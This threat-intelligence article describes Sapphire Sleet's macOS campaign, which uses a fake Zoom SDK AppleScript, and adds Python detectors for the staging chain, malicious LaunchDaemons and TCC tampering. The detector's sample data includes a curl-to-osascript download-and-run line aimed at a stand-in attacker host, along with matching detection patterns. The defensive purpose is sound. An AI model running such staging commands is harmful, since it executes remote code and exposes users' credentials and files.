A sophisticated cybercriminal group, identified as Sapphire Sleet and linked to North Korea, has initiated a targeted campaign against macOS users. This new intrusion chain leverages a deceptive Zoom SDK update to trick unsuspecting individuals into executing malware designed to steal sensitive information, including passwords, cryptocurrency, and personal data. The attack highlights a growing trend of social engineering tactics being employed to bypass technical security measures on macOS, prioritizing user manipulation over exploiting software vulnerabilities.
Microsoft Threat Intelligence analysts uncovered the campaign, noting its distinct execution patterns, particularly the use of AppleScript as a primary credential-harvesting tool, which represents a novel approach for Sapphire Sleet. The threat actor primarily targets individuals and organizations within the cryptocurrency, finance, venture capital, and blockchain sectors. Following the discovery, Microsoft responsibly disclosed its findings to Apple, which has since implemented XProtect signature updates and updated its Safari Safe Browsing protections to counter the threat.
Inside the Sapphire Sleet macOS Intrusion Chain
The infiltration begins with a carefully constructed social engineering narrative. Sapphire Sleet actors pose as recruiters on professional networking platforms, engaging victims in career-related discussions and subsequently scheduling a fake technical interview. During this interview, the victim is instructed to download a file named “Zoom SDK Update.scpt.” This compiled AppleScript leverages the macOS Script Editor application, a legitimate and trusted Apple-built tool, to mask its malicious intent. Upon opening, the script presents what appears to be routine upgrade instructions, while thousands of blank lines conceal the executable malicious code.
Once the AppleScript is executed, the infection progresses through a rapid sequence of commands. The initial script invokes the genuine macOS “softwareupdate” binary with an invalid parameter, simulating a legitimate system process. It then employs “curl” to retrieve a remote AppleScript payload and directly feeds it to the “osascript” interpreter. This multi-stage execution pattern continues through five distinct phases, each identified by specific user-agent strings (mac-cur1 through mac-cur5), enabling Sapphire Sleet to manage payload delivery and monitor the campaign’s progress.
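The staging chain described above (a bogus `softwareupdate` invocation, then `curl` feeding a remote script straight into `osascript`, with the `mac-cur1` to `mac-cur5` user-agent strings marking each stage) leaves a recognisable footprint in process telemetry. The following Python is an added detection example, not code from the article or from Microsoft; the process events are constructed to match the narrative, the event format is assumed, and the `softwareupdate` option allowlist is a partial one that an analyst would extend from `softwareupdate --help`.

```python
"""Flag the curl-to-osascript staging pattern in process-creation events (constructed sample data)."""
import os
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    user: str
    cmdline: str


# Constructed sample events (not real telemetry), modelled on the chain described in the text.
SAMPLE_EVENTS = [
    ProcessEvent(501, 1, "alice", "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"),
    ProcessEvent(510, 501, "alice", "/usr/sbin/softwareupdate --not-a-real-flag"),
    ProcessEvent(511, 501, "alice", "/bin/sh -c curl -s -A mac-cur1 https://attacker.example/stage | osascript"),
    ProcessEvent(512, 511, "alice", "/usr/bin/curl -s -A mac-cur1 https://attacker.example/stage"),
    ProcessEvent(513, 511, "alice", "/usr/bin/osascript"),
    # Benign activity that must not be flagged.
    ProcessEvent(520, 1, "bob", "/usr/bin/curl -s -A Mozilla/5.0 https://example.org/"),
    ProcessEvent(521, 1, "bob", "/usr/bin/osascript /Users/bob/scripts/backup.scpt"),
]

# curl -A / --user-agent set to one of the campaign's stage markers.
STAGE_UA = re.compile(r"(?:^|\s)(?:-A|--user-agent)\s+['\"]?mac-cur[1-5]\b")
# A shell command line that pipes curl output into the AppleScript interpreter.
CURL_TO_OSASCRIPT = re.compile(r"\bcurl\b[^|]*\|\s*(?:/usr/bin/)?osascript\b")

# Partial allowlist of softwareupdate(8) options (assumption: extend from `softwareupdate --help`).
SOFTWAREUPDATE_OPTS = {
    "-l", "--list", "-i", "--install", "-a", "--all", "-r", "--recommended", "-d", "--download",
    "--history", "--background", "--schedule", "--fetch-full-installer", "--full-installer-version",
    "--list-full-installers", "--ignore", "--reset-ignored", "--no-scan", "--verbose", "--restart",
    "--agree-to-license", "--install-rosetta", "--stdinpass", "--user", "--force",
}


def detect(events):
    """Return (pid, reason) findings for events matching the staging pattern."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        argv = e.cmdline.split()  # whitespace split is sufficient for these samples
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        args = argv[1:]
        if prog == "curl" and STAGE_UA.search(e.cmdline):
            findings.append((e.pid, "curl with staging user-agent mac-cur1..5"))
        if prog in ("sh", "bash", "zsh") and CURL_TO_OSASCRIPT.search(e.cmdline):
            findings.append((e.pid, "shell pipes curl output into osascript"))
        if prog == "osascript" and not args:
            # No script file argument: the script comes from stdin. Suspicious when the parent fetched it.
            parent = by_pid.get(e.ppid)
            if parent and "curl" in parent.cmdline:
                findings.append((e.pid, "osascript running a script from stdin under a curl parent"))
        if prog == "softwareupdate":
            unknown = [a for a in args if a.startswith("-") and a not in SOFTWAREUPDATE_OPTS]
            if unknown:
                findings.append((e.pid, f"softwareupdate with unrecognised option(s): {' '.join(unknown)}"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

On a real endpoint the events would come from an EDR feed or the Endpoint Security framework; the four rules are independent, so a single match is a lead and a cluster of matches under one parent is a strong signal.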
The mac-cur1 stage functions as the primary orchestrator. It gathers system details, registers the compromised machine with Sapphire Sleet’s command-and-control servers, and deploys a host monitoring binary masquerading as “com.apple.cli.” Concurrently, a backdoor component, dubbed “services,” installs a launch daemon named “com.google.webkit.service.plist.” This naming convention is deliberately chosen to mimic legitimate Apple and Google services, ensuring its persistence across reboots without raising suspicion.
The mac-cur2 stage introduces the credential harvesting component, disguised as “systemupdate.app.” This application presents a native macOS password dialog, identical to those generated by legitimate system processes. Upon the user entering their credentials, the malware validates the password against the local authentication database and transmits it to Sapphire Sleet’s servers via the Telegram Bot API. A subsequent fake application, “softwareupdate.app,” then displays a misleading “system update complete” message to allay any user suspicion.
To circumvent macOS security layers such as Gatekeeper and Transparency, Consent, and Control (TCC), the mac-cur3 stage manipulates the TCC database. It directs Finder to temporarily rename the TCC folder, allowing the malware to insert permissions that grant “osascript” access to sensitive files without triggering a user consent prompt. A lengthy exfiltration script, spanning 575 lines, then systematically collects nine distinct categories of data before uploading them to attacker-controlled servers. This data exfiltration is designed to operate silently in the background.
The overarching strategy of this Sapphire Sleet campaign relies heavily on user interaction to bypass macOS’s inherent security features. By prompting users to manually execute files, especially within the context of a professional interaction like an online interview, the threat actor shifts the execution into a user-initiated context where protections like Gatekeeper have diminished efficacy. This underscores the critical importance of user awareness and vigilance against sophisticated social engineering schemes.
Users and organizations are advised to treat any unsolicited requests to run terminal commands or download executable files during online interviews with extreme caution. Defensive measures should include blocking compiled AppleScript (.scpt) files where possible, regularly auditing LaunchDaemon plist files for any unexpected or unauthorized entries, and monitoring the TCC database for signs of unauthorized permission modifications. Maintaining updated macOS ensures that the latest XProtect signatures and Safari Safe Browsing protections are active, which can help block known components associated with this specific campaign.
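Two of the defensive measures above, auditing LaunchDaemon plists for unexpected entries (the persistence described under mac-cur1) and watching the TCC database for grants that appeared without a consent prompt (the mac-cur3 tampering), can be turned into a small audit. The Python below is an added example, not code from the article or from Apple or Microsoft; it builds constructed sample plists and a minimal TCC-shaped SQLite table in a temporary directory (the real TCC.db schema has more columns and changes across macOS versions), and the lookalike-label and user-writable-path heuristics are assumptions to tune per environment.

```python
"""Audit third-party LaunchDaemons and diff TCC grants against a baseline (constructed sample data)."""
import os
import plistlib
import sqlite3
import tempfile

# A root daemon should not execute code from a user-writable path.
USER_WRITABLE_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")

# Apple ships its own daemons under /System/Library/LaunchDaemons, and WebKit is an Apple project,
# so neither prefix belongs to a third-party daemon (the second is the label used in this campaign).
LOOKALIKE_LABEL_PREFIXES = ("com.apple.", "com.google.webkit")

# TCC services that confer broad file or control access.
HIGH_RISK_TCC_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles", "kTCCServiceAccessibility",
    "kTCCServiceSystemPolicyDesktopFolder", "kTCCServiceSystemPolicyDocumentsFolder",
    "kTCCServiceSystemPolicyDownloadsFolder",
}


def audit_launch_daemons(directory):
    """Return (file, reason) pairs for plists in a third-party daemon directory."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".plist"):
            continue
        try:
            with open(os.path.join(directory, name), "rb") as f:
                plist = plistlib.load(f)
        except Exception as exc:  # corrupt or non-plist file where only plists belong
            findings.append((name, f"unparseable plist: {exc}"))
            continue
        label = str(plist.get("Label", ""))
        args = plist.get("ProgramArguments") or []
        exe = plist.get("Program") or (args[0] if args else "")
        if label.startswith(LOOKALIKE_LABEL_PREFIXES):
            findings.append((name, f"label {label!r} imitates a vendor namespace"))
        if exe.startswith(USER_WRITABLE_PREFIXES):
            findings.append((name, f"program {exe!r} runs from a user-writable path"))
    return findings


def tcc_grants(db_path):
    """Set of (service, client) pairs currently allowed (auth_value 2) in a TCC-shaped database."""
    con = sqlite3.connect(db_path)
    try:
        return set(con.execute("SELECT service, client FROM access WHERE auth_value = 2").fetchall())
    finally:
        con.close()


def new_high_risk_grants(baseline, current):
    """Grants present now but absent from the baseline snapshot, limited to high-risk services."""
    return sorted((s, c) for s, c in current - baseline if s in HIGH_RISK_TCC_SERVICES)


def build_samples(root):
    """Write constructed sample data (not real system files); returns (daemon_dir, baseline_db, current_db)."""
    daemon_dir = os.path.join(root, "LaunchDaemons")
    os.mkdir(daemon_dir)
    samples = {
        "com.example.backupagent.plist": {"Label": "com.example.backupagent",
                                          "ProgramArguments": ["/Library/Application Support/Example/backupd"]},
        "com.google.webkit.service.plist": {"Label": "com.google.webkit.service",
                                            "ProgramArguments": ["/Users/alice/Library/Caches/services"],
                                            "RunAtLoad": True, "KeepAlive": True},
        "com.apple.updatehelper.plist": {"Label": "com.apple.updatehelper",  # constructed lookalike
                                         "Program": "/private/tmp/updatehelper"},
    }
    for fname, content in samples.items():
        with open(os.path.join(daemon_dir, fname), "wb") as f:
            plistlib.dump(content, f)
    # Minimal stand-in for TCC.db's `access` table; the "current" copy has gained an osascript grant.
    rows = [("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 2),
            ("kTCCServiceAddressBook", "com.example.crm", 0)]
    paths = []
    for tag, extra in (("baseline", []),
                       ("current", [("kTCCServiceSystemPolicyAllFiles", "/usr/bin/osascript", 2)])):
        db = os.path.join(root, f"tcc-{tag}.db")
        con = sqlite3.connect(db)
        con.execute("CREATE TABLE access (service TEXT, client TEXT, auth_value INTEGER)")
        con.executemany("INSERT INTO access VALUES (?, ?, ?)", rows + extra)
        con.commit()
        con.close()
        paths.append(db)
    return daemon_dir, paths[0], paths[1]


def run_demo():
    """Build the samples, run both audits and return (daemon_findings, new_tcc_grants)."""
    with tempfile.TemporaryDirectory() as root:
        daemon_dir, baseline_db, current_db = build_samples(root)
        return (audit_launch_daemons(daemon_dir),
                new_high_risk_grants(tcc_grants(baseline_db), tcc_grants(current_db)))


if __name__ == "__main__":
    daemon_findings, tcc_findings = run_demo()
    for name, reason in daemon_findings:
        print("LaunchDaemon:", name, "-", reason)
    for service, client in tcc_findings:
        print("New TCC grant:", service, "->", client)
```

In production the baseline snapshot is taken from a known-good machine (reading the system TCC.db itself needs Full Disk Access), and the daemon audit runs against /Library/LaunchDaemons; the point of diffing rather than listing is that a grant to `/usr/bin/osascript` that the user never approved stands out immediately.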

